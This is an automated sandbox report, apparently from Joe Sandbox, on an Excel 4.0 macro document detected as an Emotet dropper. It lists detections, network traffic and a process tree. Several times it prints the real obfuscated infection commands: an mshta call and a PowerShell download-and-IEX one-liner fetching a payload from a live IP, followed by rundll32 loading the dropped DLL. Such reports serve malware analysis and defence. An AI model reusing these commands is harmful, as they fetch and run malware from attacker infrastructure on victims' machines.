Windows Analysis Report
CJ68000754184.xls

Overview

General Information

Sample Name: CJ68000754184.xls
Analysis ID: 562418
MD5: 84edef677d286111cb0ef9d53e0d51df
SHA1: 19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
SHA256: 081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2792 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2916 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2812 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2712 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2552 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2076 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup
Source | Rule | Description | Author | Strings
CJ68000754184.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
CJ68000754184.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\CJ68000754184.xls | SUSP_Excel4Macro_AutoOpen | Detects Excel4 macro use with auto open / close | John Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
C:\Users\user\Desktop\CJ68000754184.xls | JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security
C:\ProgramData\JooSee.dll | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmp | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

Source | Rule | Description | Author | Strings
10.2.rundll32.exe.340000.0.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
12.2.rundll32.exe.1b0000.1.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
13.2.rundll32.exe.1b0000.0.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
15.2.rundll32.exe.4b0000.3.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security
10.2.rundll32.exe.2410000.8.raw.unpack | JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security

                            System Summary

                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2916, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2812
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2792, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2916
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit 
$c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408

                            AV Detection

                            Source: 12.2.rundll32.exe.1b0000.1.unpack, Malware Configuration Extractor: Emotet
                            Source: CJ68000754184.xls, Virustotal: Detection: 13%
                            Source: CJ68000754184.xls, ReversingLabs: Detection: 18%
                            Source: hostfeeling.com, Virustotal: Detection: 10%
                            Source: C:\ProgramData\JooSee.dll, Joe Sandbox ML: detected
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,9_2_10021854
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,12_2_10021854

                            Software Vulnerabilities

                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\cmd.exe
                            Source: global traffic, TCP traffic: 192.168.2.22:49167 -> 91.240.118.172:80
                            Source: global traffic, DNS query: name: hostfeeling.com

                            Networking

                            Source: Traffic, Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49168 -> 91.240.118.172:80
                            Source: global traffic HTTP traffic detected: GET /gg/ff/fe.png HTTP/1.1 Host: 91.240.118.172 Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: GET /assets/iM/ HTTP/1.1 Host: jurnalpjf.lan.go.id Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected:
                                HTTP/1.1 200 OK
                                Date: Fri, 28 Jan 2022 20:18:49 GMT
                                Server: Apache/2.4.6 (CentOS) PHP/7.4.27
                                X-Powered-By: PHP/7.4.27
                                Set-Cookie: 61f44fa975c8c=1643401129; expires=Fri, 28-Jan-2022 20:19:49 GMT; Max-Age=60; path=/
                                Cache-Control: no-cache, must-revalidate
                                Pragma: no-cache
                                Last-Modified: Fri, 28 Jan 2022 20:18:49 GMT
                                Expires: Fri, 28 Jan 2022 20:18:49 GMT
                                Content-Disposition: attachment; filename="KfCx9N.dll"
                                Content-Transfer-Encoding: binary
                                Content-Length: 548864
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: application/x-msdownload
                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.
                            Source: global traffic HTTP traffic detected: GET /gg/ff/fe.html HTTP/1.1 Accept: */* Accept-Language: en-US UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 91.240.118.172 Connection: Keep-Alive
                            Source: Joe Sandbox View ASN Name: OnlineSASFR
                            Source: Joe Sandbox View ASN Name: S-NET-ASPL
                            Source: Joe Sandbox View IP Address: 195.154.133.20
                            Source: Joe Sandbox View IP Address: 185.157.82.211
                            Source: unknown Network traffic detected: IP country count 21
                            Source: C:\Windows\System32\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm
                            Source: unknown DNS traffic detected: queries for: hostfeeling.com
                            Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10012C30 _memset,connect,_strcat,send,recv,9_2_10012C30
                            Source: unknown TCP traffic detected without corresponding DNS query: 91.240.118.172
                            Source: mshta.exe, 00000004.00000003.441733787.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.443968366.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.420316419.00000000002CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.445522967.00000000002CC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
